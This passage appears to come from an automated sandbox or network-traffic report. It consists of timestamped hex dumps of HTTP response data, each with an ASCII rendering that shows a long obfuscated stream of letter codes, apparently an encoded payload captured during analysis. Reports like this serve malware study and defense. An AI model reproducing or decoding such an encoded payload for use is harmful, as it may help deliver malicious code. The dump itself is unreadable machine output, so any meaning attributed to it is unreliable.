                                                                                                Data Ascii: M Un TTS UU TTS Up MS Mp nO UU Ui TTi TTg nS Tgp PS iU PS iP TSS TTg TTn gU TTM PS iU TO Pi Ui OO TTO MM gS PS iU Pi gP TMT TMg Ug TSp UU TUn iU PS pS TMn TTg TMp nS Tgg iU nP OM Pi Ui TTU TTU M MPM PS iU Pp Mp pP TTM Ti g TTM PS PM iO UO MTn TTi TTn TSg
                                                                                                2021-10-26 15:34:19 UTC100INData Raw: 53 20 54 54 67 20 50 53 20 50 55 20 6e 70 20 70 69 20 55 69 20 54 54 69 20 54 54 67 20 54 55 4f 20 54 6e 4f 20 50 53 20 69 55 20 50 54 20 67 53 20 54 55 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 54 54 20 67 4f 20 4f 50 20 4f 50 20 50 50 20 55 69 20 54 4d 53 20 4f 50 20 4d 67 6e 20 53 20 50 53 20 69 55 20 50 69 20 54 69 20 54 50 69 20 54 69 67 20 54 67 55 20 54 69 70 20 4d 69 53 20 70 69 20 69 55 20 50 53 20 50 53 20 54 53 55 20 54 70 4d 20 54 67 70 20 54 69 70 20 54 69 67 20 54 6e 55 20 70 50 20 50 53 20 50 69 20 55 53 20 6e 69 20 54 70 4d 20 54 69 69 20 54 69 67 20 4d 53 50 20 54 6e 70 20 6e 53 20 50 69 20 55 69 20 54 54 55 20 6e 6e 20 54 55 53 20 54 69 54 20 4d 53 50 20 4d 53 6e 20 50 53 20 50 69 20 55 69 20 4f 6e 20 70 4f 20 54 54 53 20 54 54 4d 20 54
                                                                                                Data Ascii: S TTg PS PU np pi Ui TTi TTg TUO TnO PS iU PT gS TU TTi TTn TSg TTT gO OP OP PP Ui TMS OP Mgn S PS iU Pi Ti TPi Tig TgU Tip MiS pi iU PS PS TSU TpM Tgp Tip Tig TnU pP PS Pi US ni TpM Tii Tig MSP Tnp nS Pi Ui TTU nn TUS TiT MSP MSn PS Pi Ui On pO TTS TTM T
                                                                                                2021-10-26 15:34:19 UTC105INData Raw: 54 53 4f 20 54 54 4d 20 50 69 20 67 69 20 50 67 20 67 53 20 4d 54 53 20 54 54 50 20 54 54 6e 20 54 53 67 20 67 54 20 6e 50 20 69 4f 20 50 53 20 70 53 20 54 4d 6e 20 4d 20 54 4d 67 20 54 53 50 20 4f 6e 20 50 50 20 54 6e 53 20 6e 50 20 55 20 55 69 20 54 54 69 20 54 54 70 20 4d 55 20 6e 55 20 50 53 20 69 55 20 50 54 20 67 6e 20 4f 4d 20 54 4d 20 70 20 54 53 4f 20 54 54 4d 20 50 69 20 67 69 20 50 55 20 67 53 20 4d 54 54 20 54 54 50 20 54 54 6e 20 54 53 67 20 67 54 20 6e 50 20 69 4f 20 50 53 20 70 53 20 69 4d 20 54 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 4d 20 50 70 20 4d 70 20 54 4f 53 20 55 50 20 54 54 69 20 54 4d 6e 20 4d 20 4f 20 50 54 20 69 55 20 50 70 20 6e 4d 20 67 4f 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 55 20 50 55 20 4d 69 20 54 55 6e 20 50 50
                                                                                                Data Ascii: TSO TTM Pi gi Pg gS MTS TTP TTn TSg gT nP iO PS pS TMn M TMg TSP On PP TnS nP U Ui TTi TTp MU nU PS iU PT gn OM TM p TSO TTM Pi gi PU gS MTT TTP TTn TSg gT nP iO PS pS iM T TTn TSO TTp gM Pp Mp TOS UP TTi TMn M O PT iU Pp nM gO TTi TTn TSP OU PU Mi TUn PP
                                                                                                2021-10-26 15:34:19 UTC109INData Raw: 70 20 54 54 6e 20 54 53 4f 20 54 54 67 20 4f 67 20 54 53 6e 20 50 53 20 50 69 20 4f 69 20 6e 69 20 55 70 20 54 53 55 20 54 54 4d 20 50 53 20 6e 55 20 6e 54 20 50 69 20 55 69 20 54 54 55 20 54 54 20 4d 55 20 54 54 4d 20 50 53 20 50 4d 20 4f 67 20 54 6e 69 20 55 50 20 54 54 69 20 54 4d 6e 20 70 4f 20 54 67 70 20 50 53 20 69 55 20 50 70 20 54 55 70 20 54 53 4d 20 54 54 69 20 54 54 6e 20 54 53 55 20 67 54 20 54 53 50 20 69 55 20 50 53 20 70 53 20 54 53 55 20 54 54 69 20 54 54 70 20 54 53 4f 20 54 54 4d 20 6e 70 20 70 50 20 50 53 20 50 69 20 55 53 20 4d 4f 20 54 55 55 20 54 53 4f 20 54 54 4d 20 50 70 20 67 4f 20 54 53 6e 20 67 67 20 54 4d 20 4d 50 50 20 4d 4d 4d 20 54 53 4f 20 54 54 4d 20 50 54 20 67 50 20 50 4d 20 67 4d 20 70 4f 20 54 54 70 20 4d 50 54 20 4d
                                                                                                Data Ascii: p TTn TSO TTg Og TSn PS Pi Oi ni Up TSU TTM PS nU nT Pi Ui TTU TT MU TTM PS PM Og Tni UP TTi TMn pO Tgp PS iU Pp TUp TSM TTi TTn TSU gT TSP iU PS pS TSU TTi TTp TSO TTM np pP PS Pi US MO TUU TSO TTM Pp gO TSn gg TM MPP MMM TSO TTM PT gP PM gM pO TTp MPT M
                                                                                                2021-10-26 15:34:19 UTC112INData Raw: 20 50 54 20 6e 67 20 67 55 20 55 69 20 54 54 69 20 54 54 67 20 54 54 53 20 54 54 20 67 4d 20 69 55 20 50 53 20 50 53 20 4d 54 70 20 55 4d 20 54 54 6e 20 54 53 4f 20 54 54 67 20 4d 70 20 54 50 6e 20 50 53 20 50 69 20 4f 69 20 4f 53 20 54 4f 4d 20 54 53 4f 20 54 54 4d 20 50 4d 20 6e 55 20 55 20 50 69 20 55 69 20 54 54 55 20 54 54 55 20 4d 20 4d 4d 53 20 50 54 20 69 55 20 50 70 20 4d 6e 20 4f 50 20 54 4d 20 6e 4f 20 54 53 4f 20 54 54 4d 20 50 69 20 50 54 20 4f 67 20 55 54 20 55 69 20 54 54 69 20 54 4d 6e 20 54 6e 4f 20 55 70 20 4d 67 20 4d 69 20 54 4d 70 20 50 69 20 55 69 20 54 4d 53 20 54 53 4d 20 54 53 70 20 54 54 50 20 6e 67 20 67 6e 20 50 53 20 50 69 20 55 53 20 4f 4f 20 54 54 69 20 6e 6e 20 4d 67 67 20 67 53 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20
                                                                                                Data Ascii: PT ng gU Ui TTi TTg TTS TT gM iU PS PS MTp UM TTn TSO TTg Mp TPn PS Pi Oi OS TOM TSO TTM PM nU U Pi Ui TTU TTU M MMS PT iU Pp Mn OP TM nO TSO TTM Pi PT Og UT Ui TTi TMn TnO Up Mg Mi TMp Pi Ui TMS TSM TSp TTP ng gn PS Pi US OO TTi nn Mgg gS MMi ii gS TnT
                                                                                                2021-10-26 15:34:19 UTC116INData Raw: 20 54 4d 69 20 50 53 20 69 55 20 67 50 20 4d 4d 20 70 4f 20 4f 4d 20 54 70 50 20 54 54 50 20 55 55 20 4d 53 50 20 69 55 20 50 53 20 69 55 20 54 54 70 20 54 55 4d 20 54 4d 69 20 54 53 4f 20 54 54 4d 20 54 4f 53 20 54 4d 69 20 50 53 20 50 69 20 55 50 20 4f 53 20 67 55 20 54 53 55 20 54 54 4d 20 50 4d 20 6e 67 20 54 4d 70 20 50 69 20 55 69 20 54 54 50 20 69 20 67 67 20 54 54 4d 20 50 53 20 69 4f 20 4d 69 20 67 6e 20 54 53 53 20 54 54 4d 20 54 54 6e 20 6e 67 20 54 54 4d 20 50 53 20 69 55 20 70 4d 20 50 69 20 55 69 20 4f 4f 20 55 50 20 54 53 4f 20 4f 69 20 4d 4d 70 20 69 70 20 4d 70 20 4d 53 54 20 55 69 20 54 54 69 20 54 54 50 20 6e 6e 20 69 55 20 69 50 20 69 55 20 50 53 20 54 55 70 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 55 20 55 55 20 4f 6e 20 69 4f 20 50
                                                                                                Data Ascii: TMi PS iU gP MM pO OM TpP TTP UU MSP iU PS iU TTp TUM TMi TSO TTM TOS TMi PS Pi UP OS gU TSU TTM PM ng TMp Pi Ui TTP i gg TTM PS iO Mi gn TSS TTM TTn ng TTM PS iU pM Pi Ui OO UP TSO Oi MMp ip Mp MST Ui TTi TTP nn iU iP iU PS TUp Mi TTi TTn TSU UU On iO P
                                                                                                2021-10-26 15:34:19 UTC120INData Raw: 53 20 50 69 20 55 4d 20 4f 53 20 54 50 70 20 54 53 4f 20 54 54 4d 20 50 70 20 69 67 20 67 54 20 50 67 20 54 54 69 20 55 4f 20 54 54 55 20 54 53 4d 20 4f 54 20 50 53 20 50 50 20 4d 69 20 50 69 20 55 69 20 54 54 69 20 54 53 4d 20 4f 67 20 54 54 50 20 50 53 20 55 4f 20 50 53 20 50 69 20 55 69 20 4d 69 4f 20 54 54 6e 20 54 53 4f 20 4f 6e 20 70 50 20 4d 69 53 20 50 54 20 50 69 20 4f 69 20 54 53 69 20 55 55 20 55 67 20 55 70 20 50 67 20 50 53 20 4f 67 20 54 4d 53 20 55 69 20 54 54 69 20 54 4d 6e 20 4d 20 54 6e 6e 20 50 54 20 69 55 20 50 70 20 54 70 20 55 67 20 4d 4f 20 54 55 67 20 54 53 55 20 54 54 4d 20 50 70 20 4d 4d 20 50 67 20 50 4d 20 50 4f 20 54 6e 6e 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4f 67 20 4d 69 69 20 50 54 20 50 69 20 4f 69 20 4d 4f 20 54 55 53
                                                                                                Data Ascii: S Pi UM OS TPp TSO TTM Pp ig gT Pg TTi UO TTU TSM OT PS PP Mi Pi Ui TTi TSM Og TTP PS UO PS Pi Ui MiO TTn TSO On pP MiS PT Pi Oi TSi UU Ug Up Pg PS Og TMS Ui TTi TMn M Tnn PT iU Pp Tp Ug MO TUg TSU TTM Pp MM Pg PM PO Tnn TTp TSO TMM Og Mii PT Pi Oi MO TUS
                                                                                                2021-10-26 15:34:19 UTC124INData Raw: 50 53 20 50 55 20 6e 53 20 4f 20 55 69 20 54 54 69 20 54 54 4f 20 54 54 67 20 4f 67 20 69 4f 20 4d 4d 20 4d 53 20 4d 55 20 69 54 20 4d 67 54 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4d 50 20 4d 53 53 20 50 53 20 50 67 20 54 53 53 20 54 4d 67 20 54 54 6e 20 54 54 69 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 4f 20 54 54 54 20 54 54 20 54 70 6e 20 69 55 20 50 53 20 50 53 20 55 6e 20 4f 53 20 4d 69 67 20 54 53 4f 20 54 54 4d 20 50 70 20 70 55 20 54 67 20 50 69 20 55 69 20 54 54 4d 20 54 54 54 20 70 69 20 54 54 50 20 4d 53 20 4d 4d 20 4d 69 20 6e 50 20 54 4f 67 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 54 20 4d 53 4d 20 69 55 20 69 4f 20 70 20 4f 67 20 54 54 69 20 54 53 70 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20
                                                                                                Data Ascii: PS PU nS O Ui TTi TTO TTg Og iO MM MS MU iT MgT TTn TSO TTp MP MSS PS Pg TSS TMg TTn TTi TTM PS iU PS Pi Ui TTi TTO TTT TT Tpn iU PS PS Un OS Mig TSO TTM Pp pU Tg Pi Ui TTM TTT pi TTP MS MM Mi nP TOg TTi TTn TSP OT MSM iU iO p Og TTi TSp TSO TTM PS iU PS
                                                                                                2021-10-26 15:34:19 UTC128INData Raw: 54 69 20 6e 50 20 54 54 20 54 69 55 20 69 55 20 50 53 20 50 53 20 54 4d 70 20 55 69 20 4f 69 20 54 50 69 20 54 54 4d 20 67 67 20 53 20 69 4f 20 50 69 20 4f 54 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 4d 67 20 50 53 20 69 55 20 67 50 20 50 4d 20 6e 69 20 54 54 54 20 55 55 20 54 53 70 20 55 70 20 6e 67 20 54 50 54 20 50 53 20 50 69 20 55 53 20 55 55 20 55 67 20 6e 53 20 54 67 50 20 50 53 20 67 50 20 4d 20 50 67 20 55 69 20 4f 53 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 6e 20 69 55 20 50 53 20 67 4f 20 55 70 20 54 53 69 20 54 53 4f 20 70 69 20 54 4d 4d 20 4d 53 20 6e 50 20 54 69 4f 20 50 69 20 55 69 20 54 54 55 20 55 55 20 54 54 70 20 4f 54 20 69 4f 20 4d 4d 20 4d 50 20 54 4f 69 20 55 70 20 54 53 53 20 54 54 54 20 70 69 20 54 4d 4d 20 4d 53 20 6e 50 20 54
                                                                                                Data Ascii: Ti nP TT TiU iU PS PS TMp Ui Oi TPi TTM gg S iO Pi OT TTi TTn TSO TMg PS iU gP PM ni TTT UU TSp Up ng TPT PS Pi US UU Ug nS TgP PS gP M Pg Ui OS TTn TSO TTM Pn iU PS gO Up TSi TSO pi TMM MS nP TiO Pi Ui TTU UU TTp OT iO MM MP TOi Up TSS TTT pi TMM MS nP T
                                                                                                2021-10-26 15:34:19 UTC132INData Raw: 20 55 4d 20 54 54 4d 20 54 69 20 54 4f 4d 20 54 54 4d 20 50 53 20 50 4d 20 69 55 20 6e 6e 20 4d 4d 55 20 54 54 69 20 54 54 6e 20 54 53 50 20 67 54 20 4d 67 4f 20 69 4f 20 50 53 20 70 53 20 54 4d 54 20 4f 70 20 54 54 4f 20 54 54 54 20 54 54 20 54 50 4f 20 69 55 20 50 53 20 50 53 20 55 70 20 4f 20 54 4f 6e 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 54 6e 67 20 50 50 20 55 69 20 54 54 70 20 54 6e 54 20 55 4f 20 55 50 20 4d 70 20 54 4d 69 20 50 53 20 50 69 20 4f 69 20 54 54 53 20 55 55 20 54 4d 50 20 55 70 20 69 55 20 6e 50 20 54 70 4f 20 50 69 20 55 69 20 54 54 55 20 54 53 4f 20 70 69 20 54 4d 54 20 4d 53 20 50 50 20 67 53 20 67 55 20 54 4d 6e 20 54 54 70 20 54 4d 6e 20 6e 53 20 54 50 55 20 50 6e 20 4d 6e 20 54 4f 4f 20 69 4f 20 55 70 20 54 54 70 20 4d 70
                                                                                                Data Ascii: UM TTM Ti TOM TTM PS PM iU nn MMU TTi TTn TSP gT MgO iO PS pS TMT Op TTO TTT TT TPO iU PS PS Up O TOn TSO TTM Pi OP Tng PP Ui TTp TnT UO UP Mp TMi PS Pi Oi TTS UU TMP Up iU nP TpO Pi Ui TTU TSO pi TMT MS PP gS gU TMn TTp TMn nS TPU Pn Mn TOO iO Up TTp Mp
                                                                                                2021-10-26 15:34:19 UTC137INData Raw: 55 4f 20 54 4d 6e 20 54 53 67 20 4f 54 20 4d 50 54 20 6e 6e 20 54 67 54 20 50 69 20 55 69 20 54 54 55 20 4f 69 20 54 67 6e 20 54 54 69 20 6e 67 20 54 70 6e 20 50 53 20 50 69 20 55 53 20 54 53 54 20 55 55 20 54 53 6e 20 55 70 20 50 4f 20 4d 55 20 67 4d 20 4d 4f 20 55 6e 20 54 4d 6e 20 4f 69 20 54 69 4f 20 54 4d 54 20 69 55 20 50 53 20 6e 67 20 54 67 53 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 4d 4d 54 20 50 54 20 69 55 20 50 4d 20 50 4d 20 70 70 20 54 53 69 20 55 55 20 54 54 50 20 55 70 20 4d 53 20 50 53 20 6e 55 20 54 67 53 20 55 69 20 54 54 69 20 54 54 67 20 54 4d 67 20 55 55 20 50 4d 20 69 55 20 50 53 20 4d 4f 20 55 70 20 4f 20 54 4f 70 20 54 53 4f 20 54 54 4d 20 50 69 20 50 53 20 6e 67 20 54 50 53 20 55 69 20 54 54 69 20 54 54 67 20 4f 50 20 54 4d 70
                                                                                                Data Ascii: UO TMn TSg OT MPT nn TgT Pi Ui TTU Oi Tgn TTi ng Tpn PS Pi US TST UU TSn Up PO MU gM MO Un TMn Oi TiO TMT iU PS ng TgS Ui TTi TTg M MMT PT iU PM PM pp TSi UU TTP Up MS PS nU TgS Ui TTi TTg TMg UU PM iU PS MO Up O TOp TSO TTM Pi PS ng TPS Ui TTi TTg OP TMp
                                                                                                2021-10-26 15:34:19 UTC141INData Raw: 4d 69 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 6e 20 50 70 20 70 53 20 54 4d 6e 20 54 70 53 20 54 4d 54 20 6e 53 20 54 6e 53 20 67 67 20 50 69 20 4d 50 20 4d 53 4f 20 4f 67 20 54 70 4d 20 50 69 20 54 53 4f 20 54 54 4d 20 69 55 20 4d 69 20 54 54 70 20 50 69 20 55 69 20 54 4d 53 20 4f 67 20 54 50 4f 20 54 54 67 20 50 53 20 50 55 20 6e 50 20 54 54 6e 20 55 69 20 54 54 69 20 54 54 4f 20 4d 55 20 50 54 20 50 53 20 69 55 20 69 55 20 67 6e 20 55 54 20 54 54 4d 20 54 53 53 20 54 53 69 20 67 54 20 54 69 55 20 69 4f 20 50 53 20 69 55 20 6e 54 20 54 54 55 20 54 53 53 20 54 53 50 20 54 69 20 4d 4d 70 20 69 4f 20 50 53 20 70 53 20 54 4d 4d 20 50 67 20 54 54 50 20 54 4d 69 20 54 54 70 20 4f 67 20 4d 53 6e 20 50 53 20 50 69 20 4f 69 20 55 4f 20 6e 4d 20 54 4d 6e 20 54 54
                                                                                                Data Ascii: Mi TSO TTM PS Mn Pp pS TMn TpS TMT nS TnS gg Pi MP MSO Og TpM Pi TSO TTM iU Mi TTp Pi Ui TMS Og TPO TTg PS PU nP TTn Ui TTi TTO MU PT PS iU iU gn UT TTM TSS TSi gT TiU iO PS iU nT TTU TSS TSP Ti MMp iO PS pS TMM Pg TTP TMi TTp Og MSn PS Pi Oi UO nM TMn TT
                                                                                                2021-10-26 15:34:19 UTC144INData Raw: 54 50 6e 20 55 70 20 6e 20 55 53 20 54 69 4d 20 54 50 4f 20 4d 4d 20 54 54 20 54 53 54 20 54 55 4f 20 69 20 4d 54 50 20 54 4d 6e 20 54 67 6e 20 4d 69 6e 20 54 6e 67 20 4d 54 55 20 54 55 4d 20 4d 54 4d 20 4d 53 4f 20 54 4f 70 20 4f 6e 20 4d 69 20 4f 53 20 4d 69 4f 20 4d 53 20 70 50 20 69 70 20 54 4d 70 20 54 6e 69 20 70 20 54 53 54 20 69 4d 20 4d 67 69 20 4d 54 4f 20 67 67 20 4d 67 70 20 54 50 50 20 50 50 20 4d 53 6e 20 54 67 4d 20 4d 4d 53 20 6e 54 20 4d 4d 20 54 55 50 20 70 54 20 54 69 54 20 54 69 6e 20 54 6e 54 20 54 69 4d 20 54 53 4d 20 4d 53 4f 20 50 67 20 4d 54 54 20 4d 54 69 20 4d 67 4d 20 54 53 55 20 54 4f 53 20 4d 50 69 20 54 6e 55 20 4d 53 53 20 70 6e 20 67 4d 20 4d 53 6e 20 54 69 50 20 4d 53 55 20 50 4f 20 54 55 67 20 4d 54 53 20 54 50 55 20 54
                                                                                                Data Ascii: TPn Up n US TiM TPO MM TT TST TUO i MTP TMn Tgn Min Tng MTU TUM MTM MSO TOp On Mi OS MiO MS pP ip TMp Tni p TST iM Mgi MTO gg Mgp TPP PP MSn TgM MMS nT MM TUP pT TiT Tin TnT TiM TSM MSO Pg MTT MTi MgM TSU TOS MPi TnU MSS pn gM MSn TiP MSU PO TUg MTS TPU T
                                                                                                2021-10-26 15:34:19 UTC148INData Raw: 53 20 54 54 4f 20 4d 53 54 20 54 69 4d 20 54 69 20 54 20 4d 54 20 4d 4f 20 6e 50 20 54 70 50 20 4d 50 69 20 54 4d 50 20 54 55 67 20 4d 69 6e 20 4d 53 20 4d 67 55 20 4d 50 50 20 50 70 20 54 55 54 20 54 6e 20 54 70 4d 20 54 53 70 20 67 20 4d 54 50 20 54 70 70 20 54 70 4d 20 4d 50 20 54 67 4d 20 54 67 67 20 4d 4d 53 20 67 50 20 6e 4d 20 54 4f 53 20 4d 50 20 4d 54 67 20 54 4d 4d 20 54 69 67 20 54 69 50 20 54 4d 70 20 54 54 4f 20 4f 6e 20 54 70 6e 20 54 53 54 20 54 53 53 20 4d 20 54 53 6e 20 54 70 20 54 50 54 20 4d 67 20 54 6e 70 20 50 4f 20 4d 53 55 20 54 67 6e 20 54 69 4f 20 54 4d 53 20 54 69 54 20 54 69 4f 20 54 50 4d 20 55 4f 20 4d 53 69 20 6e 69 20 54 54 6e 20 6e 53 20 54 53 67 20 54 55 53 20 54 4d 55 20 67 53 20 54 6e 50 20 4d 54 53 20 54 69 4d 20 67 54
                                                                                                Data Ascii: S TTO MST TiM Ti T MT MO nP TpP MPi TMP TUg Min MS MgU MPP Pp TUT Tn TpM TSp g MTP Tpp TpM MP TgM Tgg MMS gP nM TOS MP MTg TMM Tig TiP TMp TTO On Tpn TST TSS M TSn Tp TPT Mg Tnp PO MSU Tgn TiO TMS TiT TiO TPM UO MSi ni TTn nS TSg TUS TMU gS TnP MTS TiM gT
                                                                                                2021-10-26 15:34:19 UTC152INData Raw: 20 54 53 54 20 4d 4d 69 20 54 54 55 20 54 67 6e 20 4d 69 6e 20 70 69 20 54 55 55 20 50 50 20 70 53 20 54 6e 69 20 4d 69 20 54 54 55 20 54 67 6e 20 4d 69 6e 20 55 67 20 54 70 54 20 54 69 70 20 4d 4d 55 20 4d 4d 50 20 55 20 54 54 20 54 54 69 20 4d 67 50 20 4d 53 4f 20 54 54 54 20 4d 53 6e 20 54 70 69 20 67 20 54 4d 6e 20 50 55 20 4d 67 55 20 54 53 4f 20 50 69 20 4d 53 4d 20 4d 53 70 20 4f 69 20 4d 69 50 20 54 54 54 20 54 67 70 20 4d 55 20 54 53 20 54 4f 4f 20 4d 4d 53 20 6e 55 20 54 69 67 20 4d 69 67 20 50 67 20 50 67 20 54 54 69 20 4d 67 50 20 4d 53 4f 20 4d 69 54 20 4f 55 20 54 4d 67 20 54 55 53 20 4d 4d 4f 20 54 6e 70 20 54 55 67 20 54 4f 54 20 4d 4d 69 20 70 54 20 54 4d 69 20 50 4d 20 54 69 54 20 54 69 6e 20 4f 20 4d 50 53 20 54 50 70 20 4f 6e 20 54 53
                                                                                                Data Ascii: TST MMi TTU Tgn Min pi TUU PP pS Tni Mi TTU Tgn Min Ug TpT Tip MMU MMP U TT TTi MgP MSO TTT MSn Tpi g TMn PU MgU TSO Pi MSM MSp Oi MiP TTT Tgp MU TS TOO MMS nU Tig Mig Pg Pg TTi MgP MSO MiT OU TMg TUS MMO Tnp TUg TOT MMi pT TMi PM TiT Tin O MPS TPp On TS
                                                                                                2021-10-26 15:34:19 UTC156INData Raw: 70 20 4d 4d 20 4d 50 53 20 54 4f 55 20 54 55 4f 20 4d 53 70 20 55 55 20 4d 4d 50 20 54 67 53 20 6e 6e 20 4d 69 4f 20 54 67 4f 20 54 6e 4f 20 54 54 54 20 67 53 20 4d 67 53 20 4f 4f 20 4d 54 50 20 69 70 20 4d 53 6e 20 54 69 50 20 50 4f 20 54 70 70 20 4d 53 4f 20 4d 4d 54 20 54 67 4f 20 54 67 53 20 67 4d 20 54 55 54 20 54 54 4f 20 54 50 50 20 6e 53 20 4d 67 4f 20 4d 50 69 20 4d 54 69 20 54 70 67 20 54 55 70 20 70 69 20 54 54 53 20 54 50 4d 20 54 70 69 20 54 54 6e 20 4d 67 50 20 4d 53 4f 20 55 70 20 6e 53 20 50 20 4d 67 4d 20 54 4f 54 20 4d 67 53 20 4d 54 53 20 4d 4d 67 20 4d 69 53 20 55 6e 20 50 50 20 67 4f 20 54 50 69 20 55 53 20 50 55 20 4d 67 4d 20 4d 4d 4d 20 6e 69 20 54 50 69 20 69 70 20 4d 53 6e 20 54 69 50 20 4f 4d 20 54 4f 53 20 53 20 4d 69 55 20 54
                                                                                                Data Ascii: p MM MPS TOU TUO MSp UU MMP TgS nn MiO TgO TnO TTT gS MgS OO MTP ip MSn TiP PO Tpp MSO MMT TgO TgS gM TUT TTO TPP nS MgO MPi MTi Tpg TUp pi TTS TPM Tpi TTn MgP MSO Up nS P MgM TOT MgS MTS MMg MiS Un PP gO TPi US PU MgM MMM ni TPi ip MSn TiP OM TOS S MiU T
                                                                                                2021-10-26 15:34:19 UTC160INData Raw: 55 20 67 4d 20 55 69 20 54 4f 67 20 54 54 4f 20 4d 69 69 20 54 54 69 20 67 70 20 69 55 20 4d 69 54 20 50 4d 20 4d 53 50 20 54 54 4d 20 4f 4f 20 54 53 4f 20 54 70 70 20 69 55 20 54 70 4f 20 69 55 20 67 4d 20 55 69 20 54 50 50 20 54 54 4f 20 4d 69 69 20 54 54 69 20 67 70 20 69 55 20 54 4f 6e 20 50 4d 20 54 6e 20 54 54 4d 20 4f 4f 20 54 53 4f 20 4f 4f 20 69 4f 20 54 54 6e 20 69 55 20 69 55 20 55 69 20 70 4f 20 54 54 55 20 50 4d 20 54 54 4d 20 50 4d 20 69 55 20 54 54 50 20 50 67 20 54 67 20 54 54 69 20 54 54 50 20 54 53 4f 20 50 4f 20 69 4f 20 54 53 50 20 50 53 20 69 55 20 55 69 20 69 6e 20 54 54 55 20 50 4d 20 54 54 4d 20 50 4d 20 69 55 20 6e 50 20 50 67 20 54 67 20 54 54 69 20 54 54 50 20 54 53 4f 20 54 50 20 69 4f 20 54 53 50 20 50 53 20 69 55 20 55 69 20
                                                                                                Data Ascii: U gM Ui TOg TTO Mii TTi gp iU MiT PM MSP TTM OO TSO Tpp iU TpO iU gM Ui TPP TTO Mii TTi gp iU TOn PM Tn TTM OO TSO OO iO TTn iU iU Ui pO TTU PM TTM PM iU TTP Pg Tg TTi TTP TSO PO iO TSP PS iU Ui in TTU PM TTM PM iU nP Pg Tg TTi TTP TSO TP iO TSP PS iU Ui
                                                                                                2021-10-26 15:34:19 UTC164INData Raw: 69 20 55 50 20 54 54 69 20 54 54 6e 20 4d 54 20 54 4d 6e 20 50 53 20 69 55 20 4d 50 54 20 50 50 20 4f 67 20 54 54 69 20 54 54 54 20 54 53 4f 20 54 54 67 20 50 54 20 69 55 20 50 53 20 54 50 55 20 4f 54 20 54 54 69 20 54 54 6e 20 54 70 69 20 54 54 67 20 50 6e 20 69 55 20 54 4f 20 50 69 20 4d 54 4d 20 54 54 50 20 54 53 54 20 54 53 4f 20 54 55 53 20 70 54 20 69 55 20 50 53 20 4d 50 50 20 55 50 20 54 4d 69 20 54 54 6e 20 6e 55 20 54 54 4d 20 50 54 20 69 4f 20 50 53 20 50 69 20 4f 4d 20 4f 55 20 54 54 6e 20 54 53 4f 20 54 55 50 20 50 54 20 70 4d 20 50 53 20 54 55 20 55 69 20 54 54 50 20 54 54 70 20 54 53 4f 20 54 54 4d 20 4d 4d 20 67 4d 20 50 53 20 50 69 20 4d 54 6e 20 54 54 50 20 54 4d 4d 20 54 53 4f 20 55 55 20 50 53 20 69 4f 20 50 54 20 50 69 20 55 69 20 67
                                                                                                Data Ascii: i UP TTi TTn MT TMn PS iU MPT PP Og TTi TTT TSO TTg PT iU PS TPU OT TTi TTn Tpi TTg Pn iU TO Pi MTM TTP TST TSO TUS pT iU PS MPP UP TMi TTn nU TTM PT iO PS Pi OM OU TTn TSO TUP PT pM PS TU Ui TTP TTp TSO TTM MM gM PS Pi MTn TTP TMM TSO UU PS iO PT Pi Ui g
                                                                                                2021-10-26 15:34:19 UTC169INData Raw: 20 50 69 20 70 70 20 54 54 69 20 54 55 69 20 4f 50 20 4d 54 55 20 50 53 20 67 67 20 50 53 20 4d 53 67 20 54 53 4d 20 54 67 69 20 54 54 70 20 54 4d 67 20 54 54 4d 20 69 67 20 67 20 70 54 20 50 50 20 70 70 20 54 54 69 20 70 69 20 4f 69 20 54 4d 6e 20 50 54 20 67 55 20 50 53 20 54 53 67 20 54 53 67 20 54 4d 53 20 54 54 70 20 54 4d 67 20 54 54 4d 20 54 6e 4f 20 67 20 4d 53 67 20 50 50 20 70 70 20 54 54 69 20 4d 67 4d 20 4f 69 20 54 54 70 20 69 55 20 67 55 20 50 53 20 54 69 67 20 54 53 67 20 54 4d 6e 20 54 54 4f 20 54 4d 67 20 54 54 4d 20 4d 67 54 20 67 20 70 67 20 50 4d 20 70 70 20 54 54 69 20 54 67 4d 20 4f 69 20 4f 6e 20 69 55 20 67 67 20 50 53 20 4d 67 20 4f 70 20 54 4d 53 20 54 54 70 20 54 4d 67 20 54 54 4d 20 54 50 20 69 20 67 70 20 50 4d 20 70 70 20 54
                                                                                                Data Ascii: Pi pp TTi TUi OP MTU PS gg PS MSg TSM Tgi TTp TMg TTM ig g pT PP pp TTi pi Oi TMn PT gU PS TSg TSg TMS TTp TMg TTM TnO g MSg PP pp TTi MgM Oi TTp iU gU PS Tig TSg TMn TTO TMg TTM MgT g pg PM pp TTi TgM Oi On iU gg PS Mg Op TMS TTp TMg TTM TP i gp PM pp T
                                                                                                2021-10-26 15:34:19 UTC173INData Raw: 4f 53 20 54 53 50 20 4d 53 50 20 54 54 4d 20 50 4d 20 69 55 20 70 20 54 55 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 50 69 20 69 55 20 4d 54 70 20 69 70 20 54 69 69 20 55 69 20 54 54 70 20 54 54 6e 20 70 54 20 55 69 20 50 53 20 69 55 20 50 53 20 50 69 20 55 4d 20 54 53 70 20 54 67 69 20 54 54 4f 20 4d 67 20 50 53 20 50 69 20 50 53 20 4f 53 20 54 54 4d 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 54 54 70 20 50 53 20 54 6e 50 20 69 4d 20 54 4f 50 20 54 54 69 20 54 54 50 20 54 53 4f 20 4d 67 4d 20 4d 4d 20 69 55 20 50 53 20 50 69 20 55 69 20 50 4d 20 54 54 4f 20 54 6e 67 20 54 53 55 20 54 6e 69 20 69 55 20 50 67 20 50 69 20 4d 4d 69 20 55 70 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 54 6e 4f 20 50 53 20 50 4f 20 6e 67 20 4d 54 53 20 54 54
